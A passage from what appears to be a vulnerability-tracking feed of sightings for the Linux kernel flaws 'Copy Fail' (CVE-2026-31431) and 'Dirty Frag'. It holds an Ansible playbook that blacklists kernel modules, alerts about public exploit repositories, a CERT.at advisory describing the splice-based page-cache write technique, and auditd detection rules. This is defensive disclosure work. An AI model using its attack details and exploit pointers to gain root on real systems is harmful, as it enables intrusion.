\u0440\u0435\u0430\u043b\u044c\u043d\u043e \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e AFS (Andrew File System). \u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u043d\u0435\u0442 AFS - \u0441\u043c\u0435\u043b\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0439\u0442\u0435\n\n\u0422\u0440\u0438 \u0433\u043e\u0434\u0430, \u0434\u0435\u0432\u044f\u0442\u044c \u043b\u0435\u0442. \u0414\u0432\u0430 \u0431\u0430\u0433\u0430 \u043b\u0435\u0436\u0430\u043b\u0438 \u0440\u044f\u0434\u043e\u043c \u0438 \u0436\u0434\u0430\u043b\u0438. \u041e\u0434\u0438\u043d \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u043e\u0434\u0438\u043d \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043e\u0434\u0438\u043d claude, \u0432\u0441\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b. \u0418 \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 - \u043d\u0438 \u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0430\u0442\u0447\u0430. \u0412\u043e\u0442 \u0432\u0430\u043c \u0438 \u043a\u043e\u043e\u0440\u0434\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435", "creation_timestamp": "2026-05-08T04:56:49.000000Z"}, {"uuid": "3e7526eb-8cb9-4871-9b6d-fa432147d75f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/redhat-linux-kernel-multiple-vulnerabilities_20260508", "content": "", "creation_timestamp": "2026-05-07T20:00:00.000000Z"}, {"uuid": "0b62c7a8-432e-40aa-adb5-f33ae3a22813", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/inmediasit/a0387a5d338969501c2ef41d5886397d", "content": "---\n# Mitigation for \"Dirty Frag\" (xfrm-ESP Page-Cache Write + RxRPC Page-Cache Write LPE)\n# https://dirtyfrag.io / https://github.com/V4bel/dirtyfrag\n#\n# Apply:  ansible-playbook playbooks/dirtyfrag-mitigation.yml\n# Remove: once the vendor kernel is patched, delete the modprobe conf and reload modules.\n#\n# NOTE: Unlike Copy Fail (CVE-2026-31431), the algif_aead / AF_ALG mitigation is\n# NOT sufficient here.  The xfrm-ESP sink is reachable regardless of algif_aead.\n# This playbook can be applied in addition to the Copy Fail playbook.\n#\n# Affected: kernels >= cac2661c53f3 (2017-01-17) for esp4/esp6\n#                   >= 2dc334f1a63a (2023-06)    for rxrpc\n# Tested on: Ubuntu 24.04, RHEL/AlmaLinux 10, Fedora 44, openSUSE Tumbleweed, CentOS Stream 10\n\n- hosts: all\n  gather_facts: true\n  become: yes\n\n  tasks:\n    # ------------------------------------------------------------------ #\n    # 1. Block the three vulnerable modules via modprobe blacklist         #\n    # ------------------------------------------------------------------ #\n\n    - name: Install modprobe blacklist for esp4, esp6, rxrpc\n      ansible.builtin.copy:\n        dest: /etc/modprobe.d/dirtyfrag.conf\n        owner: root\n        group: root\n        mode: '0644'\n        content: |\n          # Dirty Frag mitigation \u2014 block vulnerable kernel modules.\n          # xfrm-ESP Page-Cache Write (esp4/esp6) and RxRPC Page-Cache Write (rxrpc)\n          # Remove once the vendor kernel ships a fix.\n          install esp4  /bin/false\n          install esp6  /bin/false\n          install rxrpc /bin/false\n\n    # ------------------------------------------------------------------ #\n    # 2. Unload the modules if currently loaded                           #\n    #    (rmmod fails gracefully when the module isn't present)           #\n    # ------------------------------------------------------------------ #\n\n    - name: Unload rxrpc if loaded\n      community.general.modprobe:\n        name: rxrpc\n        state: absent\n      ignore_errors: true\n\n    - name: Unload esp6 if loaded\n      community.general.modprobe:\n        name: esp6\n        state: absent\n      ignore_errors: true\n\n    - name: Unload esp4 if loaded\n      community.general.modprobe:\n        name: esp4\n        state: absent\n      ignore_errors: true\n\n    # ------------------------------------------------------------------ #\n    # 3. Fallback: rmmod via shell for distros where community.general    #\n    #    modprobe with state=absent is not idempotent                     #\n    # ------------------------------------------------------------------ #\n\n    - name: Force-remove modules via rmmod (best-effort)\n      ansible.builtin.shell: |\n        for mod in esp4 esp6 rxrpc; do\n          if lsmod | grep -q \"^${mod} \"; then\n            rmmod \"$mod\" 2>/dev/null && echo \"removed $mod\" || echo \"could not remove $mod (in use?)\"\n          else\n            echo \"$mod not loaded\"\n          fi\n        done\n      register: rmmod_result\n      changed_when: \"'removed' in rmmod_result.stdout\"\n\n    - name: Show rmmod output\n      ansible.builtin.debug:\n        msg: \"{{ rmmod_result.stdout_lines }}\"\n\n    # ------------------------------------------------------------------ #\n    # 4. Regenerate initramfs so the blacklist survives a reboot          #\n    #    (distro-aware: update-initramfs on Debian/Ubuntu,                #\n    #     dracut on RHEL/Fedora/SUSE)                                     #\n    # ------------------------------------------------------------------ #\n\n    - name: Regenerate initramfs (Debian/Ubuntu)\n      ansible.builtin.command: update-initramfs -u -k all\n      when: ansible_os_family == \"Debian\"\n      changed_when: true\n\n    - name: Regenerate initramfs (RHEL / Fedora / AlmaLinux / CentOS / SUSE)\n      ansible.builtin.command: dracut --force --regenerate-all\n      when: ansible_os_family in [\"RedHat\", \"Suse\"]\n      changed_when: true\n\n    # ------------------------------------------------------------------ #\n    # 5. Verification                                                     #\n    # ------------------------------------------------------------------ #\n\n    - name: Verify modprobe blacklist is in place\n      ansible.builtin.command: cat /etc/modprobe.d/dirtyfrag.conf\n      register: modprobe_conf\n      changed_when: false\n      failed_when: >\n        \"install esp4\"  not in modprobe_conf.stdout or\n        \"install esp6\"  not in modprobe_conf.stdout or\n        \"install rxrpc\" not in modprobe_conf.stdout\n\n    - name: Verify esp4 is not loaded\n      ansible.builtin.shell: lsmod | grep -q '^esp4 ' && echo LOADED || echo NOT_LOADED\n      register: esp4_check\n      changed_when: false\n      failed_when: esp4_check.stdout == \"LOADED\"\n\n    - name: Verify esp6 is not loaded\n      ansible.builtin.shell: lsmod | grep -q '^esp6 ' && echo LOADED || echo NOT_LOADED\n      register: esp6_check\n      changed_when: false\n      failed_when: esp6_check.stdout == \"LOADED\"\n\n    - name: Verify rxrpc is not loaded\n      ansible.builtin.shell: lsmod | grep -q '^rxrpc ' && echo LOADED || echo NOT_LOADED\n      register: rxrpc_check\n      changed_when: false\n      failed_when: rxrpc_check.stdout == \"LOADED\"\n\n    - name: Attempt to load esp4 (must fail due to blacklist)\n      ansible.builtin.command: modprobe esp4\n      register: esp4_load_attempt\n      changed_when: false\n      failed_when: esp4_load_attempt.rc == 0   # rc != 0 means blacklist worked\n\n    - name: Attempt to load rxrpc (must fail due to blacklist)\n      ansible.builtin.command: modprobe rxrpc\n      register: rxrpc_load_attempt\n      changed_when: false\n      failed_when: rxrpc_load_attempt.rc == 0\n\n    - name: Summary\n      ansible.builtin.debug:\n        msg:\n          - \"Dirty Frag mitigation applied successfully.\"\n          - \"esp4:  {{ esp4_check.stdout }}\"\n          - \"esp6:  {{ esp6_check.stdout }}\"\n          - \"rxrpc: {{ rxrpc_check.stdout }}\"\n          - \"Blacklist reboot-persistent: yes (initramfs regenerated)\"\n          - \"NOTE: If IPsec (ESP) is required in your environment, this mitigation\"\n          - \"      will break it. Apply only on hosts where ESP is not in use.\"", "creation_timestamp": "2026-05-08T06:26:34.000000Z"}, {"uuid": "6959bdf0-3643-40e9-a0e0-8cb78a2e65b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83322", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Copy-fail-CVE-2026-31431-Exploit-in-C\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Mr-bv\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-08 07:57:24\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDiscovery and original disclosure of CVE-2026-31431: Theori / Xint. Public writeup: https://copy.fail/.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-08T08:00:04.000000Z"}, {"uuid": "20d97009-57a9-43ca-b437-50c61799a76b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/morrolinux/a11e43c7ab528b0c93ce2bb35b28bbd9", "content": "", "creation_timestamp": "2026-05-08T10:50:12.000000Z"}, {"uuid": "aab18365-c7bf-414b-8426-92d3e00900b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83333", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a c-copy-fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a OpenPixelSystems\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-08 09:52:07\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 in C for aarch64 and amd64\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-08T10:00:04.000000Z"}, {"uuid": "ef3fe5fb-5f3f-460f-87c5-6fa0b532e8b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/anupyadav.bsky.social/post/3mldlykjmrs2n", "content": "Linux Kernel CVE-2026-31431 Explained in Simple Terms\ntechrefreshing.com/linux-kernel...\n#Linux #CyberSecurity #CVE #LinuxKernel #CloudSecurity #DevOps #Kubernetes #InfoSec #SysAdmin #OpenSource", "creation_timestamp": "2026-05-08T11:13:41.557317Z"}, {"uuid": "a0c1f0de-f20d-4816-b821-ce87660a26d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/appricot.bsky.social/post/3mldmdol7j22i", "content": "Ah, ffs! Just the other day CopyFail (CVE-2026-31431), now DirtyFlag .. my life is a chin of Linux patches and kernel module blockings these days ...", "creation_timestamp": "2026-05-08T11:19:52.044429Z"}, {"uuid": "5d540071-6522-49ce-99ca-e839cf700a86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://fosstodon.org/users/alpinelinux/statuses/116538695628774725", "content": "2 new vulnerabilities similar to coyfail:\n- CVE-2026-31431 (Dirty Frag)- CVE-2026-43284\nhttps://github.com/V4bel/dirtyfrag\nWe're waiting for a release containing the last one before pushing new kernels to aports.\nhttps://github.com/V4bel/dirtyfrag#cleanup mentions a mitigation in the meantime.", "creation_timestamp": "2026-05-08T11:22:57.254090Z"}, {"uuid": "b6f2d74c-0540-4722-857d-b204c243f01a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/claudesjean.bsky.social/post/3mldocmwky52w", "content": "Copy Fail \u2014 CVE-2026-31431", "creation_timestamp": "2026-05-08T11:55:07.293322Z"}, {"uuid": "388650b8-3f48-47f6-b558-eee3fa5395a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mldqhvck5ls2", "content": "Unpatched Linux Kernel Flaw Dirty Frag Grants Root Access Security researchers have disclosed details of a new local privilege escalation vulnerability in the Linux kernel, designated as an unpatch...\n\n#Security #CVE-2026-31431 #Dirty #Frag #Linux #kernel #privilege #escalation #security [\u2026]", "creation_timestamp": "2026-05-08T12:33:52.141679Z"}, {"uuid": "b7489a5e-1f8c-422d-ac95-e98990f2e20d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.cert.at/de/warnungen/2026/5/linux-lpe-dirty-frag-copy-fail-2", "content": "08. Mai 2026\n\nBeschreibung\n\nAm 7. Mai 2026 wurden zwei neue Schwachstellen im Linux-Kernel öffentlich gemacht, die unter den Namen „Dirty Frag“ und „Copy Fail 2: Electric Boogaloo“ bekannt sind. Beide Schwachstellen ermöglichen lokalen, nicht privilegierten Benutzer:innen eine Eskalation auf root. Sie liegen in den In-Place-Entschlüsselungspfaden der Kernel-Module esp4, esp6 (IPsec/ESP) sowie rxrpc und nutzen Page-Cache-Writeprimitives aus, indem über splice(2), sendfile(2) bzw. MSG_SPLICE_PAGES angehängte, nicht kernelseitig privat gehaltene Seiten direkt überschrieben werden.\n\nFunktionsfähige Proof-of-Concept-Exploits (PoCs) sind öffentlich verfügbar und ermöglichen die Eskalation auf root in einem einzigen Aufruf.\n\nCVE-Nummer(n): CVE-2026-43284 (Dirty Frag), N/A (Copy Fail 2)\n\nCVSS Base Score: noch nicht vergeben\n\nAuswirkungen\n\nLokale, nicht privilegierte Angreifer:innen können durch Ausnutzung der Schwachstellen beliebige Inhalte im Page-Cache des Kernels überschreiben und sich dadurch root-Rechte auf dem betroffenen System verschaffen. Es handelt sich um deterministische Logikfehler ohne Race-Condition; bei einem Fehlschlag tritt keine Kernel-Panik auf, die Erfolgswahrscheinlichkeit wird als hoch beschrieben.\n\nDer xfrm-ESP-Pfad setzt die Möglichkeit zur Erstellung von User-Namespaces voraus. Der RxRPC-Pfad benötigt diese Voraussetzung nicht, ist jedoch nur auf Distributionen ausnutzbar, in denen das Modul rxrpc.ko verfügbar bzw. geladen ist. Durch Verkettung beider Pfade lässt sich auf den meisten gängigen Distributionen root erlangen.\n\nBestehende Gegenmaßnahmen gegen „Copy Fail“ (CVE-2026-31431), insbesondere das Sperren des Moduls algif_aead, schützen NICHT gegen „Dirty Frag“ oder „Copy Fail 2“.\n\nBetroffene Systeme\n\nBetroffen sind die meisten aktuellen Linux-Distributionen mit aktiviertem Page-Cache-Pfad in esp4/esp6 bzw. rxrpc. Die zugrundeliegenden Code-Stellen existieren laut Hersteller- und Forscher:innen-Angaben seit Kernel-Commit cac2661c53f3 (xfrm-ESP, Januar 2017) bzw. 2dc334f1a63a (RxRPC, Juni 2023). Die folgende Aufstellung ist daher nicht abschließend; sie führt nur diejenigen Distributionen auf, deren Hersteller die Betroffenheit bisher öffentlich bestätigt haben oder für die der Forscher die Ausnutzung explizit getestet hat:\n\n\n\nUbuntu 24.04 (vom Forscher getestet auf Kernel 6.17)\n\nRed Hat Enterprise Linux 10.1 (vom Forscher getestet); Red Hat hat in RHSB-2026-003 die Betroffenheit zudem für Red Hat OpenShift Container Platform 4 bestätigt\n\nCentOS Stream 10\n\nAlmaLinux 8, 9 und 10 (gepatcht in kernel-4.18.0-553.123.2.el8_10, kernel-5.14.0-611.54.3.el9_7 bzw. kernel-6.12.0-124.55.2.el10_1 und neuer)\n\nFedora 44\n\nopenSUSE Tumbleweed\n\nCloudLinux 7h, 8, 9 und 10 (CloudLinux 7 wird vom Hersteller noch untersucht)\n\nBlueOnyx 5210R, 5211R, 5212R\n\n\nAmazon Linux untersucht laut Sicherheitsbulletin 2026-027-AWS aktuell den genauen Umfang der betroffenen Versionen.\n\nDistributionen, die unprivilegierte User-Namespaces standardmäßig blockieren (z. B. Ubuntu via AppArmor in bestimmten Konfigurationen), sind über den xfrm-ESP-Pfad nicht angreifbar, bleiben aber über den RxRPC-Pfad anfällig, sofern das Modul vorhanden ist.\n\nAbhilfe\n\nZum Zeitpunkt der Veröffentlichung dieser Warnung liegen für die meisten Distributionen noch keine vollständig gepatchten Kernel vor. Der Upstream-Fix für den ESP-Pfad wurde am 7. Mai 2026 in den netdev-Tree aufgenommen (Commit f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4); der RxRPC-Fix ist noch nicht gemergt. Einzelne Distributionen (u. a. AlmaLinux, CloudLinux) haben gepatchte Kernel bzw. KernelCare-Livepatches in Vorbereitung oder bereits in Test bzw. Auslieferung.\n\nCERT.at empfiehlt, die folgenden Maßnahmen umzusetzen:\n\n\n\nSicherheitsaktualisierungen der jeweiligen Distribution einspielen, sobald diese verfügbar sind, und das System neu starten.\n\nBis zur Verfügbarkeit gepatchter Kernel die betroffenen Kernel-Module sperren, sofern sie nicht produktiv benötigt werden. Die Module esp4 und esp6 werden für IPsec-Tunnel (z. B. strongSwan, Libreswan) verwendet; rxrpc wird nahezu ausschließlich von AFS-Clients genutzt. Auf Systemen, die diese Funktionen nicht einsetzen, kann das Sperren der Module ohne Funktionsverlust erfolgen, beispielsweise durch Eintragen entsprechender Regeln in /etc/modprobe.d/ und Entladen aktuell geladener Module.\n\nAuf Hosts, die IPsec-Tunnel terminieren oder weiterleiten, dürfen die Module esp4/esp6 nicht gesperrt werden. In diesem Fall ist die Installation eines gepatchten Kernels bzw. eines Livepatches abzuwarten.\n\n\nMehrschichtige Mitigationen (Modul-Blacklist über modprobe.d sowie zusätzlich modprobe.blacklist=... als Kernel-Parameter) erhöhen die Wirksamkeit, insbesondere gegen ein automatisches Nachladen über Netlink aus User-Namespaces heraus.\n\nHinweis\n\nGenerell empfiehlt CERT.at, sämtliche Software aktuell zu halten und dabei insbesondere auf automatische Updates zu setzen. Regelmäßige Neustarts stellen sicher, dass diese auch zeitnah aktiviert werden.\n\n\n\nInformationsquelle(n):\n\nDirty Frag - Disclosure und PoC durch Hyunwoo Kim (Englisch)https://github.com/V4bel/dirtyfrag\n\nGreg Kroah-Hartman zur CVE-Vergabe auf der oss-security-Mailingliste (Englisch)https://seclists.org/oss-sec/2026/q2/441\n\nCopy Fail 2: Electric Boogaloo - Write-up und PoC (Englisch)https://afflicted.sh/blog/posts/copy-fail-2.html\n\nAlmaLinux: Dirty Frag vulnerability fix is ready for testing (Englisch)https://almalinux.org/blog/2026-05-07-dirty-frag/\n\nCloudLinux: Dirty Frag - Mitigation and Kernel Update (Englisch)https://blog.cloudlinux.com/dirty-frag-mitigation-and-kernel-update\n\nRed Hat: How to mitigate the „Dirty Frag“ vulnerability in OpenShift 4 (RHSB-2026-003) (Englisch)https://access.redhat.com/solutions/7142250\n\nRed Hat Security Bulletin RHSB-2026-003 (Englisch)https://access.redhat.com/security/vulnerabilities/RHSB-2026-003\n\nAmazon: Dirty Frag and other issues in Amazon Linux kernels (Englisch)https://aws.amazon.com/security/security-bulletins/rss/2026-027-aws/\n\nBlueOnyx: Security Advisory: Dirty Frag & Copy Fail 2 - Two New Linux LCE Vulnerabilities (Englisch)https://www.blueonyx.it/news/sec-adv-dirtyfrag-copyfail2.html\n\nUpstream-Fix für den ESP-Pfad (netdev/net.git) (Englisch)https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4", "creation_timestamp": "2026-05-08T09:29:25.000000Z"}, {"uuid": "01d37344-5f7c-4f1a-9afc-28b18d963bda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/rspinternetgroup.bsky.social/post/3mldsc7v6xs2z", "content": "\u3010\u304a\u77e5\u3089\u305b\u3011[RisuPu] Linux\u74b0\u5883\u306b\u304a\u3051\u308b\u30ed\u30fc\u30ab\u30eb\u6a29\u9650\u6607\u683c\u306e\u8106\u5f31\u6027\uff08CVE-2026-31431\uff09\u306b\u95a2\u3059\u308b\u3054\u6848\u5185\nrspig.jp/notice/annou...", "creation_timestamp": "2026-05-08T13:06:26.017936Z"}, {"uuid": "62b3883a-9b5f-462e-90d0-8be58104b6a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-nsm/ny-alvorlig-sarbarhet-i-linux", "content": "", "creation_timestamp": "2026-05-08T04:06:44.000000Z"}, {"uuid": "5e29fe1d-8ede-4362-acdf-ab5534ff4eae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/O_e3myBcoh_AaGdxUcA5YqeGGADBaBeF3XGiX3aOj54Bo8U", "content": "", "creation_timestamp": "2026-05-07T15:00:07.000000Z"}, {"uuid": "4b935acf-c43e-4cff-b133-c27641ce11f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ciq.com/post/3mldvan4kqf26", "content": "Copy Fail patches are available now for every supported Rocky Linux variant from CIQ!\n\nCVE-2026-31431 had a public exploit in circulation within days -- patched kernels across LTS, FIPS, and current variants shipped within the week.\n\nFull response: bit.ly/4u0HhGw #LinuxSecurity #RockyLinux", "creation_timestamp": "2026-05-08T13:59:13.313490Z"}, {"uuid": "620f614a-3c62-427f-9c98-e4dd5e9e1f4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/xvoYgOFnUf5jFw65_bW2FC7fcn6orx4l4LTjm0d68ZkOEzo", "content": "", "creation_timestamp": "2026-05-08T03:00:06.000000Z"}, {"uuid": "dc871074-a71c-4ea0-ad80-dbca5d32c26f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/vzTACITSxs978bepVF2fAbJ-LA46ia7V8AwPJb289jK3goA", "content": "", "creation_timestamp": "2026-05-07T21:00:05.000000Z"}, {"uuid": "9844571c-29e9-4961-a69b-75b46bf8b31f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/ejAET7Wd0n1V5uqKctP5d-vJmqb8O4j5F4lTKyPXLyKbJrU", "content": "", "creation_timestamp": "2026-05-06T03:00:05.000000Z"}, {"uuid": "770724a6-f5f6-4ada-ac80-f7210db2b4cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/yfj8_Wf1r81ZM9XH5mmBYiYd4G1zdIl6xbgawa_XXGScCdQ", "content": "", "creation_timestamp": "2026-05-05T21:00:04.000000Z"}, {"uuid": "20e7285f-f711-4c1a-abd8-5cf720369133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/TOBO1j4X53-mWPhUjqfqsPILi5P8C_iHzeNGcih4hj7jhkY", "content": "", "creation_timestamp": "2026-05-05T15:00:07.000000Z"}, {"uuid": "f09a1afd-18c5-4a80-9926-bfe7ee56c105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/dsiEA15uidVU6KDez4EkzkpuPE2tuEKKJLQ-eeC4Q0mRqFk", "content": "", "creation_timestamp": "2026-05-07T09:00:04.000000Z"}, {"uuid": "ef29a5ce-a251-4d46-ab2c-1e3b31c7fd13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/N1Jo8qZWaWReiL_t-N5l6uzcgIVKcO6O8PdoiYgN9aP0HPY", "content": "", "creation_timestamp": "2026-05-07T03:00:06.000000Z"}, {"uuid": "b415af03-95af-4c32-bf0b-0bf2d2d7b8bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/YNBAQ7wY3nDaf6oW9SS_pET1W5P-GdTLvm9dgaO_EDkfw4Y", "content": "", "creation_timestamp": "2026-05-05T09:00:04.000000Z"}, {"uuid": "5915cb4c-3259-42b0-87b4-a4866c7bd606", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/qLnk1n5B0PR5yjep7bbwsMJyTwvCWVIASLg9mGkcsDxA1Jk", "content": "", "creation_timestamp": "2026-05-06T21:00:04.000000Z"}, {"uuid": "cf5f50c3-015f-40f9-924d-dec09da0ff8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/ZNI-uYyJrm1t-Pzb3CHRhrHrIF7V6AFj0czDxk1WB0iTdAU", "content": "", "creation_timestamp": "2026-05-06T15:00:06.000000Z"}, {"uuid": "1ed30ab1-3d59-42fc-b85b-c4019f9a4183", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/nRCd-6n0pDvmfvM7KgbobBK2YcSbDsH8Dcp0n-zDwiT4HOU", "content": "", "creation_timestamp": "2026-05-06T09:00:04.000000Z"}, {"uuid": "76cec8c7-3467-460c-a717-bd5f68aa8c54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mlcoqsnj6m2m", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 371 interactions\nCVE-2026-41940: 96 interactions\nCVE-2026-0300: 24 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 15 interactions\nCVE-2026-25679: 10 interactions\nCVE-2026-27140: 8 interactions\n", "creation_timestamp": "2026-05-08T02:30:19.994512Z"}, {"uuid": "90636451-232f-4fb0-ab9e-87051b5cb2aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/0xlane/99519eac7a5fea1992d7ba6a423a0707", "content": "# CVE-2026-31431 (Copy Fail) Detection Rules for auditd\n#\n# Install:\n#   sudo cp auditd-rules.conf /etc/audit/rules.d/copyfail.rules\n#   sudo augenrules --load\n#\n# Or apply temporarily:\n#   sudo auditctl -a always,exit -F arch=b64 -S socket -F a0=38 -k copyfail_af_alg\n#   sudo auditctl -a always,exit -F arch=b64 -S splice -k copyfail_splice\n#\n# Search logs:\n#   ausearch -k copyfail_af_alg\n#   ausearch -k copyfail_splice\n\n# Rule 1: Detect AF_ALG socket creation 